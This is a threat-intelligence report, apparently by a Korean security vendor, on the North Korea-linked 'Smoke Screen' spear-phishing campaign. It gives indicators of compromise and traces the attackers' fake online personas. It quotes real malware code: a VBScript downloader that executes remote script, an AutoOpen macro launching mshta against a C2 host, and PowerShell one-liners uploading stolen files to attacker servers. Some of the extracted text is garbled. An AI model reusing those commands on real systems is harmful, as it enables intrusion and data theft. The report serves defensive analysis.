# Analysis of the APT Campaign Smoke Screen targeting to # Korea and US ※ Campaign Smoke Screen Flowchart ESRC found a spear phishing attack occurred on April 11th targeting to those who work in North Korea-related fields. The attack, it turns out, was an extension of APT attack of ‘Operation Stealth Power’, which was spread on April 03, under the theme of [Recent trends of major countries related to the Korean peninsula] and [3.17 US Pentagon Secret National Security Council] (The word ‘Pentagon’ of the second file is not correctly spelled in Korean), and the same threat actors are behind the Campaign “Smoke Screen” as those who are responsible for the attack on Korea Hydro & Nuclear Power in 2014. ----- [Figure 1] E-mail disguised as government official's remarks about Korea-US Summit The threat actor attempts to trick users into opening the email titled “Government official's remarks about Korea-US Summit, with a malicious .hwp attachment named ‘Government official's remarks about Korea-US Summit.hwp’. As the distributed malicious hwp document file was encrypted, the EPS vulnerability could not be exploited without entering the password. When a document file vulnerability is triggered, it attempts to communicate with a specific command control (C2) server in Korea and loads the file 'first.hta'. The VBScript code contained within the HTML application host is then executed. Set Post0 = CreateObject("MSXML2.ServerXMLHTTP.6.0"): Post0.open "GET", "http://naban.co[.]kr/mobile/skin/member/ctml/v/expres.php?op=1", False: ----- Post0.Send: t0=Post0.responseText: Execute(t0) The malicious script code goes through stages 1-3 of the following steps, runs a PowerShell based keylogger, and secretly collects information from the infected computer, then registers itself in the system registry to conduct espionage operations by communicating with its C2 server. ----- When the malicious HWP document is executed, the title Government official s remarks about Korea-US Summit.hwp(20190409)’ and the content will be displayed. The document is registered with the account 'Tom', which is the same as that of 'Stealth Power' operation. [Figure 1-1] Screen shown after running malicious HWP and the 'Tom' account A malicious .doc' file named 'TaskForceReport.doc', which was created at 05:15 pm (KST) on April 01, 2019, has been discovered abroad. ESRC has observed that the malicious DOC file was related to the recent infringement incidents occurred in South Korea and the United States, meaning that the threat organization is actively involved in targeted attacks at home and abroad. Interestingly, the series of malware used in the APT attack is directly or indirectly related to ‘Kimsuky [organization, Operation Stealth Power Silent Operation’ (2019-04-30) and 'Huge threat coming up,](https://blog.alyac.co.kr/2234) “Operation Giant Baby”' (2019-03-28), which is one of ‘Baby’ Campaign series. ----- The malicious HWP document files, which have been found in Korea from the end of March to the beginning of April, exploited the same vulnerability and the same account name 'Tom'. [Figure 1-2] Metadata of HWP malicious document file **■ Background of the APT Campaign ‘Smoke Screen’, the master of camouflage and smokescreen** **tactics** The malicious file 'TaskForceReport.doc' was first reported abroad, but the document was written in Korean, and numerous similar variants have been found. The author of the malicious file used the unusual Windows accounts such as 'windowsmb', 'JamFedura', 'Aji', 'DefaultAcount', 'yer' and 'Roberts Brad' etc., has traded cryptocurrencies such as Bitcoin (BTC), and participated in the development of gambling games and cryptocurrency-related programs. ----- Some accounts are registered on the Korean messenger Kakao Talk, and they are using the messenger services such as Telegram and Skype as well. ESRC believes that there are 'state-sponsored actors' behind the APT attack based on the analyzed data, and named the APT attack 'Campaign Smoke Screen', concerning that the attackers are fluent in Korean and English and act secretly by abusing the stolen profiles that are using photos of foreigners. **■ Analysis of tactics and threat vector of DOC-based APT attack** The malicious document file 'TaskForceReport.doc' (MD5: d400adcd06e0a07549e2465c9c500c45) created on April 01, 2019 was distributed via the following address. - tdalpacafarm[.]com/wp-includes/Text/Diff/common/doc.php However, the above server has already been used by the malicious document 'Oct_Bld_full_view.docm '(MD5: 1a6f9190e7c53cd4e9ca4532547131af) as C2 server, and reported as ['New BabyShark Malware Targets U.S.](https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/) National Security Think Tanks' by Unit 42 team of Palo Alto Networks. The VBA code used at the time is as follows. Sub change_words(ByVal findWord, ByVal replaceWord) With Selection.Find .Text = findWord .Replacement.Text = replaceWord ----- .Forward True .Wrap = wdFindContinue .MatchWholeWord = True End With Selection.Find.Execute Replace:=wdReplaceAll End Sub Sub AutoOpen() Shell ("mshta https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta") End Sub If the 'Vkggy0.hta' in the code above is loaded normally, it will receive an HTTP GET response by executing the internal VBScript command and the additional PowerShell commands would be subsequently executed. The recently found malicious document files also have the same sequence flow. When a malicious document file is executed, a security alert messages, telling that the software update is required to display the content, pops up to trick users into clicking the Enable Content button. ----- [Figure 2] Screen displayed after executing the malicious document written in Korean The malicious document contains files range from 'activeX1.bin' to 'activeX10.bin'. The file 'activeX2.bin' is the one that has the communication host addresses as follows, and it tries the additional C2 communication by means of HTA commands and conditions. - https://tdalpacafarm[.]com//wp-includes/Text/Diff/common/Htqgf0.hta - https://tdalpacafarm[.]com//wp-includes/Text/Diff/common/expres.php?op=1 - https://tdalpacafarm[.]com//wp-includes/Text/Diff/common/cow.php?op=exe.gif - https://tdalpacafarm[.]com//wp-includes/Text/Diff/common/cow.php?op=cow.gif ----- [Figure 3] Code of 'activeX2.bin' file Another variant with the same name as the 'TaskForceReport.doc' (MD5: 0f77143ce98d0b9f69c802789e3b1713) file has been propagated in March. - https://christinadudley[.]com/public_html/includes/common/Qfnaq0.hta - https://christinadudley[.]com/public_html/includes/common/expres.php?op=1 - https://christinadudley[.]com/public_html/includes/common/cow.php?op=Normal.src - https://christinadudley[.]com/public_html/includes/common/Normal.src - https://christinadudley[.]com/public_html/includes/common/cow.php?op=exe.gif - https://christinadudley[.]com/public_html/includes/common/cow.php?op=cow.gif The C2 domain christinadudley[.]com was used for distribution. The file 'Qfnaq0.hta' contains the following script code, which loads the code 'expres.php?op=1' with the decoding key and the routine. ----- The finally delivered file 'exe.gif' is encoded in BASE64 code, and converted to 32-bit EXE format malware after the process of decoding. [Figure 4] The file encoded in BASE64 The decoded EXE file contains a digital signature of EGIS Co, Ltd, that has been exploited in past infringement incidents in Korea. ----- [Figure 5] Digital signature of EGIS Co., Ltd. HTA script used in the DOC attack vector indicates that the similar script format has been used in both the recently discovered APT attack 'Campaign Smoke Screen' and the HWP document-based attack 'Operation Stealth Power', which occurred on March 31 and April 1 in Korea. The PowerShell-based function ‘Start-KeyLogger’ installed by the HWP malicious document was also used the same as it is used in the DOC malicious document series. The threat organization exploited the HWP document vulnerability for conducting the APT attack against Korea while they used malicious DOC documents for carrying out the attacks targeting to foreign countries. ----- [Figure 6] Comparison of malicious scripts found home and abroad In particular, the above figure shows that the function styles used by PowerShell as well as the file names ('expres.php?op=1', 'cow.php?op=1") and parameters used to communicate with the C2 server are very similar in both scripts. ----- In addition, the file name upload.php is used in common for information leakage. The C2 server exploiting the HWP vulnerability is in Korea, and the C2 server exploiting DOC vulnerability contains the subaddress 'kr' in the middle of the address. - HWP retu=wShell.run("cmd.exe /c powershell.exe (New-Object System.Net.WebClient).UploadFile ('http://jmable.mireene[.]com/shop/price/com/upload.php','"&ttmp0&"');del """&ttmp0&""";del """&ttmp&"""",0,true) - DOC retu=wShell.run(“powershell.exe (New-Object System.Net.WebClient).UploadFile (‘https://tdalpacafarm[.]com/files/kr/contents/upload.php’,'”&ttmp1&”‘);del “””&ttmp1&”””;del “””&ttmp&””””,0,true) Also, both files have exactly the same registry key 'VBAWarnings' and the log file name 'ttmp.log'. Many of the traces mentioned above and the similar pattern of server-side attacks are suggesting that both HWP malicious documents found in Korea and the DOC malicious documents reported in foreign countries were used as the attack method by the same APT group. ----- [Figure 7] Creating the registry key 'VBAWarnings' and the file 'ttmp.log' M li i DOC d t fil h t i d b K l tti b d f lt ----- [Figure 8] Malicious document file in Korean language Settings **■ Comparison of Similar Threat Cases and Indicators of Compromise** A number of threat cases exploiting hta files have been identified recently, especially a large proportion of the use of C2 server '(seoulhobi[.]biz / 192.186.142[.]74)’. The malware 'AltcoinMiningBot.exe' (MD5: cf264f9bca2f2fbcc2c1e7a4a491afec) disguised as Altcoin mining bot program has been distributed and communicates with the host '192.186.142[.]74'. ----- http://seoulhobi[.]biz/how/fmaov0.hta - http://192.186.142[.]74/cache/fwvuj0.hta - http://192.186.142[.]74/cache/expres.php?op=1 - http://192.186.142[.]74/cache/expres.php?op=2 - http://192.186.142[.]74/cache/cow.php?op=exe.gif - http://192.186.142[.]74/cache/cow.php?op=cow.gif - http://192.186.142[.]74/cache/upload.php - http://192.186.142[.]74/mn/xtgnb0.hta - http://192.186.142[.]74/post/Yluhi0.hta - http://192.186.142[.]74/dll/Mylqn0.hta - http://192.186.142[.]74/lib/szgfj0.hta - http://192.186.142[.]74/lib/expres.php?op=1 - https://login-main.bigwnet[.]com/attachment/view/note.php - https://login-main.bigwnet[.]com/attachment/view/Msgxo0.hta - https://login-main.bigwnet[.]com/attachment/view/expres.php?op=1 - https://login-main.bigwnet[.]com/attachment/view/cow.php?op=Normal.src ----- https://login main.bigwnet[.]com/attachment/view/Msgxo.hta - https://login-main.bigwnet[.]com/attachment/view/expres.php?op=2 - https://mohanimpex[.]com/include/tempdoc/891250/doc.php - https://mohanimpex[.]com/include/tempdoc/891250/Ersrr0.hta - https://mohanimpex[.]com/include/tempdoc/891250/expres.php?op=1 - https://mohanimpex[.]com/include/tempdoc/891250/Pkjjy.hta - https://mohanimpex[.]com/include/tempdoc/891250/upload.php - https://mohanimpex[.]com/include/tempdoc/891250/image.png - https://fmchr[.]in/images/common/NEACD/Qzqrn0.hta - https://fmchr[.]in/images/common/NEACD/expres.php?op=1 - https://fmchr[.]in/images/common/NEACD/upload.php - https://fmchr[.]in/images/common/NEACD/cow.php?op=1 Malicious files communicating with the host 192.186.142[.]74 are additionally discovered. - 'update.exe' (MD5 : b74909e14e25d2e9d1452b77f9927bf6) - 'explorer.tmp' (MD5 : 599ef2988141d251c3f4ce991a9b5cd2) The malicious file 'explorer.tmp' uses 'cowboy' characters and the name 'cowboy' is also used for the command 'cow.php?op=cow.gif'. ----- [Figure 9] String ‘cowboy’ inside the malware Variants created from February to April 2019 are categorized by time zone as follows. C2 https://christinadudley[.]com/public_html/includes/common/Qfnaq.hta MD5 e68b11bef48e8e88cba7e3c93fac5eab File Name Task_Force_report.doc Last Modified Date (KST) 2019-03-05 18:18 Last Modified Name windowsmb C2 https://christinadudley[.]com/public_html/includes/common/Qfnaq.hta |File Name|Task_Force_report.doc| |---|---| |Last Modified Date (KST)|2019-03-05 18:17| |Last Modified Name|windowsmb| |C2|https://christinadudley[.]com/public_html/includes/common/Qfnaq.hta| |MD5|e68b11bef48e8e88cba7e3c93fac5eab| |File Name|Task_Force_report.doc| |---|---| |Last Modified Date (KST)|2019-03-05 18:18| |Last Modified Name|windowsmb| |C2|https://christinadudley[.]com/public_html/includes/common/Qfnaq.hta| |MD5|0f77143ce98d0b9f69c802789e3b1713| ----- |File Name|Speaking notes-ExMon Deterrence Summit-24Mar-rev26Mar19.doc| |---|---| |Last Modified Date (KST)|2019-03-21 17:42| |Last Modified Name|windowsmb| |C2|https://login-main.bigwnet[.]com/attachment/view/Msgxo0.hta| |MD5|7ca1a603a7440f1031c666afbe44afc8| |File Name|Speaking notes-ExMon Deterrence Summit-24Mar-rev26Mar19.doc| |---|---| |Last Modified Date (KST)|2019-03-26 09:45| |Last Modified Name|windowsmb| |C2|n/a| |MD5|60973af3b8ecbbb0ab659124409b7df1| |File Name|Speaking notes-ExMon Deterrence Summit-24Mar-rev26Mar19.doc| |---|---| |Last Modified Date (KST)|2019-03-27 10:06| |Last Modified Name|windowsmb| |C2|n/a| |MD5|2ff911b042e5d94dd78f744109851326| |File Name|TaskForceReport.doc| |---|---| |Last Modified Date (KST)|2019-04-01 17:15| |Last Modified Name|windowsmb| |C2|https://tdalpacafarm[.]com//wp- includes/Text/Diff/common/Htqgf0.hta| |MD5|d400adcd06e0a07549e2465c9c500c45| From March to April 2019, document files with the account name 'windowsmb' were created, but the account names 'JamFedura' and 'Aji' were used in February. The file 'Speaking notes-ExMon Deterrence Summit-24Mar-rev26Mar19.doc' was created as not only a normal file but also a malicious file. The attacker exploited the malicious document created by 'John Harvey'. ----- [그림 9-1] Document created by 'John Harvey' is modified by 'windowsmb' |File Name|OFT.docm| |---|---| |Last Modified Date (KST)|2019-02-14 23:08| |Last Modified Name|JamFedura| |C2|http://192.186.142[.]74/cache/Fwvuj0.hta| |MD5|304d86463a1fff5183aacc17ef2b3730| |File Name|bot spec.docm| |---|---| |Last Modified Date (KST)|2019-02-18 17:30| |Last Modified Name|JamFedura| |C2|http://192.186.142[.]74/mn/Xtgnb0.hta| |MD5|f816a9c4a3415e8bae807c09e0f80b38| |File Name|white_paper.doc| |---|---| |Last Modified Date (KST)|2019-02-19 17:29| |Last Modified Name|Aji| |C2|http://192.186.142[.]74/dll/Mylqn0.hta| ----- |File Name|Schedule_.doc| |---|---| |Last Modified Date (KST)|2019-02-22 17:09| |Last Modified Name|JamFedura| |C2|http://192.186.142[.]74/post/Yluhi0.hta| |MD5|29fbf69e72c0daac57d2cbba11bbfaa5| |File Name|xCryptoCrash_Schedule.doc| |---|---| |Last Modified Date (KST)|2019-02-25 02:26| |Last Modified Name|JamFedura| |C2|http://192.186.142[.]74/post/Yluhi0.hta| |MD5|397ba1d0601558dfe34cd5aafaedd18e| |File Name|white_paper.doc| |---|---| |Last Modified Date (KST)|2019-02-26 15:40| |Last Modified Name|JamFedura| |C2|http://www.seoulhobi[.]biz/how/Fmaov0.hta| |MD5|49bac05068a79314e00c28b163889263| The malicious document file 'white_paper.doc' has been registered by two accounts 'Aji' and 'JamFedura', but the same C2 server was used as the domain seoulhobi[.]biz (192.186.142[.]74) for those accounts. In addition, the cryptocurrency-related decoy file such as 'xCryptoCrash_Schedule.doc' was deployed for performing the attack. **■ Investigation of the threat actors based on Human-Led Threat Intelligence** ----- ESRC has confirmed that the attacker used MonoVM web hosting with the email account 'snow8949@hotmail.com' during the process of investigating the person who registered the domain seoulhobi[.]biz (192.186.142[.]74). As reference information, there have been some reports on the use of the "snow + number" email ID in an infringement incident occurred in Korea in 2018. The phishing domain disguised as a Korea's largest web portal has been used for those attacks, with Japan selected in registration information, and names such as "Jane Jhone" were used as well. - http://nidhelpnaver[.]com The analysis as described above is revealing the correlation of the threat actors as follows. First of all, the account 'JamFedura' was identified in the attack in February. The similar accounts have been registered to several social media platforms such as Twitter, Telegram and Cryptolancer with different profile images. Twitter account '@JFedura' is set to the United States in the location setting and enrolled in December 2017, there is some English typo in the introduction column, [Cryptocurrency Developer] is mentioned. 'jamfedura' that is the account of Cryptolancer, which connects a cryptocurrency developer as a freelancer to the employers, was enrolled in February 2019, introduces itself as [Cryptocurrency Developer] and is set to China in location settings. ----- [Figure 10] Fake accounts similar to Twitter, Telegram and Cryptolancer The postings on Twitter contains only a retweet of the cryptocurrency transactions or a short tweet in English created by several accounts. The hackers were also carrying out the operations with the same ID and profile image as Twitter accounts on the online outsourcing platform Wishket, which connects Korean program development companies and freelancer developers. ----- In addition, they joined the international Bitcoin Forum August 2017, and has been active by January 2018. [Figure 11] Portfolio registered in Bitcoin Forum and Wishket Self-introduction posted on Wishket describes the personal history of the hacker including the 8 years of development experience and active participation in the cryptocurrency development, along with portfolios of ‘the development of game sites’, the development of crypto-mining programs’ and ‘the cryptocurrency trading sites’ uploaded. ----- Bitcoin Forum displays his malicious activities such as the email address JamShine1993@hotmail.com, which is linked to 'om*****@hotmail.com’. The bitcoin wallet address (15vsH2T3ss9owzuaGnN7ee155tEwS4igFg) is also seen in Bitcoin Forum, but no specific transaction details have been observed. - [https://www.blockchain.com/ko/btc/address/15vsH2T3ss9owzuaGnN7ee155tEwS4igFg](https://www.blockchain.com/ko/btc/address/15vsH2T3ss9owzuaGnN7ee155tEwS4igFg) [Figure 12] Account linked to the hotmail address registered in Bitcoin Forum The variant, which is related to the analysis data of ['NavRAT Uses US-North Korea Summit As Decoy For](https://blog.talosintelligence.com/2018/05/navrat.html) [Attacks In South Korea' released by Cisco Talos team in May 2018 is strongly linked to the “Smoke Screen”](https://blog.talosintelligence.com/2018/05/navrat.html) campaign. ----- Talos team has previously suspected that there was possibility of the correlation between NavRAT family and 'Group123' (aka Geumseong121, RedEyes), and ESRC confirmed that the series is exactly the same as the HWP vulnerability shellcode used for the attack on Korea Hydro & Nuclear Power in 2014. ESRC is conducting a thorough investigation on “Smoke Screen” campaign, regarding that specific IP bands and typical disturbance tactics used for the campaign show similar patterns to the multiple strategies and techniques deployed in recent cyber operations. According to the self-analysis data and classification criteria, it is most likely that the KHNP-related hacking group is behind the “Smoke Screen” APT campaign, rather than Geumseong121. However, since the same IOC has been identified in the attacks carried out by the two organizations in several cases, there was a possibility of mutual cooperation, reorganization, and shift of the personnel system. ESRC found that the malicious file variant named 'NavRAT' attempted to communicate with an email account 'jamshine1993@hotmail.com' in the process of investigating the threat actors behind the “Smoke Screen” APT campaign. The ID 'tiger199392' disguised as a Google update program was used for the communication and sent information of the infected users to the email address 'Jamshine1993@hotmail.com'. ----- [Figure 13] NavRAT communicating with 'JamShine1993@hotmail.com' The "NavRAT" type of malicious file contains some similar accounts (hni) to the HWP vulnerability code (MD5: c94e5da189bf166fc4a2670685a796a3) of the so-called "Kimsuky" series reported in 2016. ----- [Figure 14] Comparison of NavRAT (upper) series and Kimsuky series HWP (lower) code A similar account is also found on Telegram, where the representative profile image is displayed by stealing the image of "Reece Thompson," starring actor of 2007 movie ‘Rocket Science’. ----- [Figure 15] Stealing the image of the starring actor of 2007 movie ‘Rocket Science’ for Telegram profile It is not clear whether the movie was stolen on purpose or randomly selected by the attacker, and it is known that a Korean judge appears in the movie. Twitter's profile image was also created by an unauthorized use of one of the images posted on a hair model site. ----- [Figure 16] Model images on “hothairstyle” site ESRC found that the account 'jamfedura0293' on Telegram was registered on January 4, 2019 [in the Korean version of Philippine bitcoin trading site 'Bit Manila'. The attacker has been](http://www.bitmanila.com/) i h i 'K i jj 1985' ----- [For reference, as 'Bit Manila' is operated in common with 'Philgo' site, users can use the same](https://www.philgo.com/) ID on both sites. [Figure 17] The hacker’s activities in the Philippine bitcoin trading site '코인짱1985' account is secretly trading with sellers and buyers by creating the comments inducing the site users to contact him via Telegram. In particular, he posted a comment on the post “Sales of 1500 bitcoin”, which was uploaded on December 23 last year, at 23:58 on January 04, 2019. ----- 1500 bitcoin is a substantial amount even considering the market price at the time. [Figure 18] Trading activities on Filipino bitcoin trading site ESRC have discovered the multiple accounts using the same profile image which is the same as that used for Telegram. Interestingly, 'tiger1993' account, which was used by the malware, has been registered on KakaoTalk with the name 'coinchange'. Furthermore, the profile image of the account exactly matched the image of the Telegram account '@jamfedura0293'. ----- [Figure 19] 'tiger1993' registered in KakaoTalk It is practically impossible for a two different person to accidentally use the same profile image on KakaoTalk and Telegram at the same time. The same profile image was also found on 'freelancer' site, which connects the program developers and the employers. ----- [Figure 20] 'aji9170' registered on 'freelancer' site using the same image The account 'aji9170' registered on the freelance site is set as Korea in the nationality, and displays the cryptocurrency developer information in the same way as the existing case. The user registered with the account 'aji9170' posted the several texts in English and Korean, appealing that he has been actively participated in the multiple projects, and his nationality is set on Korea. https://www.freelancer.co.kr/projects/mobile-phone/develop-bustabit-game/ I put a lot of coins on the bustabit game. erc20, shekel, xgox, ethereum, I can show you my demo. I want to discuss with you in detail. thank you. ----- https://www.freelancer.co.kr/projects/php/javascript expert who can integrate/ Hello. i have read your project carefully. i can finish your project on time and pefect. Let's discuss more detail on chat. Thanks https://www.freelancer.co.kr/projects/c-programming/hidden-vnc-with-back-connection/ Hello. I have module what you want. i wanna discuss about your detail requirement. i have an exerienece about Virus and malware. Thanks https://www.freelancer.co.kr/projects/python/telagram-bitmex-bot/ I have already made many bots. I can show you. I can fulfill your request smoothly. I want to discuss with you in detail. Thank you. https://www.freelancer.co.kr/projects/php/perfect-money-payment-gateway-18523359/ Hello I have already made it. I can do it. Let's discuss on chatting in detail. Thank you. ####################################################################### # https://www.freelancer.co.kr/projects/c-programming/need-expert-18408762/ Hello I master in c++ ----- I can do it. Let's discuss on chatting. Thank you. ############################################### https://www.freelancer.co.kr/projects/linux/finish-linux-project-18498297/ Hello sir I can do it for 1day. Let's discuss on chatting. Thank you. ########### ############################### https://www.freelancer.co.kr/projects/software-architecture/lock-bitings/ Hello. i can do your project successfully on time. i am very interesting in your project. Let's discuss more detail on chat. Thanks. https://www.freelancer.co.kr/projects/java/expert-coding/ I am a cryptographer. I can fulfill your request well. I want to discuss with you in detail. thank you. ################################################################# https://www.freelancer.co.kr/projects/software-architecture/online-game-18406869/ Hello, I managed an online server. I can protect your server from DoS attacks. I want to discuss with you in detail, Thank. ----- https://www.freelancer.co.kr/projects/software architecture/lock bitings/ Hello. i can do your project successfully on time. i am very interesting in your project. Let's discuss more detail on chat. Thanks. https://www.freelancer.co.kr/projects/php/install-bitcoin-ethereum-full-node/ Hello, I can do it perfectly. Let's discuss on chatting. Thank you. ################################## [Figure 21] Request for project development with 'aji9170' account ESRC has found the account that creates a post that introduces himself as a freelancer in a similar fashion, during the tracking process of unique attack patterns and the specific keywords. ----- [Figure 22] Freelancer working as 'aji199293' The user of the account "aji199293" was joined on January 15, 2019, and the nationality is set on the United States. The profile and self-introduction contains his career and skills in cryptocurrency development. It is interesting that he also created the posts in Korean, and he was using the account 'live:rjh917' on Skype as well. ----- [Figure 23] Posts uploaded by 'aji199293' The posts which have been created by 'aji199293' is very similar to those created by 'aji9170'. https://www.freelancer.co.kr/projects/php/send-whatsapp-message/ Hello I made many bots. I can do it with c++. Let's discuss on chatting. Thank you. ######################################### https://www.freelancer.co.kr/projects/php/crypto-trading-bot-tradingview-scrip/ Hello ----- I have already created an automated bot that uses binance s api. I can show it to you. I want to discuss with you in detail. Thank you. https://www.freelancer.co.kr/projects/php/cryptocurrency-website-18560239/ Hello I have done it. I can show you my demo. Let's discuss on chatting. Thank you. ####################################################################### #################### https://www.freelancer.co.kr/projects/php/blockchain-dice-game/ Hello. i have developed such like this game i am very interesting in your project Please send me a message so that we can discuss more Thanks https://www.freelancer.co.kr/projects/php/fhg-please-read-request-before/ Hello. I have already developed all the 11 things you need. I will show you all my demos. I want to discuss with you in detail. Thank you. https://www.freelancer.co.kr/projects/php/proxy-creator-18562916/ Hello I have proxies. I have developed them. So Which site do you want? P i d t k ll it ----- Let s discuss on chatting in detail. Thank you. https://www.freelancer.co.kr/projects/graphic-design/email-marketing-landing-page development/ Hello I have experience in email marketing. I built many email sender servers. I can fulfill your demands. I want to discuss with you in detail. Thank you. [Figure 24] Comparison of 'aji9170' and 'aji199293' The nationality of the account 'aji199293' is currently set on the United States of America, but its activities with a different ID was identified and its nationality was set to Korea in the early days. He also participated in the development of online games for gambling, and created some posts appealing that he has development capabilities for outsourcing PDF Exploit. It is evident that he has was involved in the development of malicious files ----- [Figure 25] Participation in the development of online games for gambling and malware The account 'Migel M' (Nationality: Korea) uses the same profile image as that used for the account 'aji199293' (Nationality: the US). Comparing the two accounts 'Migel M' and 'aji199293' revealed that the same user had been active with the account 'Migel M' in the early days, and he later changed the nationality and ID. It is noteworthy that users, who are registered on freelance sites as developers of online games for gambling and cryptocurrency sites, are actively participate in the development of malicious programs as well. ----- User of the account 'rjh917@hotmail.com' is providing more details of the discovery. The account 'devAji917' using the same ID has been found on GitHub, and it was registered around April 2018. - [https://github.com/devAji917](https://github.com/devAji917) [- https://github.com/kgretzky/evilginx2/issues/253](https://github.com/kgretzky/evilginx2/issues/253) [- https://github.com/cryptonotefoundation/cryptonote/issues/221](https://github.com/cryptonotefoundation/cryptonote/issues/221) [- https://github.com/cryptonotefoundation/cryptonote/issues/222](https://github.com/cryptonotefoundation/cryptonote/issues/222) [Figure 26] User account 'devAji917' registered on GitHub The user of the account 'aji199293' uses the account 'rjh917' on Skype, and the same person is the using the account 'devAji917' ----- As it is used similar to 'aji9170' user account, it seems that the user of those accounts is the same person. The account 'devaji917' is also registered on BitShares. - [https://wallet.bitshares.org/#/account/devaji917](https://wallet.bitshares.org/#/account/devaji917) - [https://bts.ai/u/devaji917](https://bts.ai/u/devaji917) [Figure 27] The account 'devaji917' registered on BitShares The user of ID 'devaji917' has been also found, registered as US citizens on Guru site. [- https://www.guru.com/freelancers/devaji917](https://www.guru.com/freelancers/devaji917) ----- [Figure 28] 'devAji917' registered as a freelancer on Guru site ESRC has identified the email account 'om197019621993@hotmail.com' used by tiger199392 during the process of tracking the attacker behind the campaign, and that the same account was also registered on PayPal, which is often used as payment service for project development on a freelancer site. [- https://github.com/Fungsyujonggu](https://github.com/Fungsyujonggu) ----- Also, the same hotmail address was found in the 'Fungsyujonggu' Github account, which looks like a Chinese account. [Figure 29] Correlation between 'om197019621993@hotmail.com' and 'tiger199392' ----- The master account of jamshine1993@hotmail.com set by JemFedura in [Figure 12] is connected to 'om197019621993@hotmail.com'. ## ■ Identification of "Campaign Smoke Screen" with Two Faces A similar case was made public on January 30, 2019 from Chosun Media, with the article titled '200 North Korean hacking groups sending up to $ 1 million to North Korea per team'. ESRC has confirmed that national cyber threat actors are actively participating in foreign currency earning by developing the various software as well as conducting the APT attacks. In particular, the hackers were involved in the development of cryptocurrency trading sites, crypto-mining programs, online gambling sites and worked as a development agency of malicious programs. The analysis of 'Smoke Screen' campaign, in which hackers are disguising themselves as foreigners, shows that APT the threat landscape is evolving by indicating the various forms. Further information will be provided in the [Threat Inside](https://www.threatinside.com/) service. -----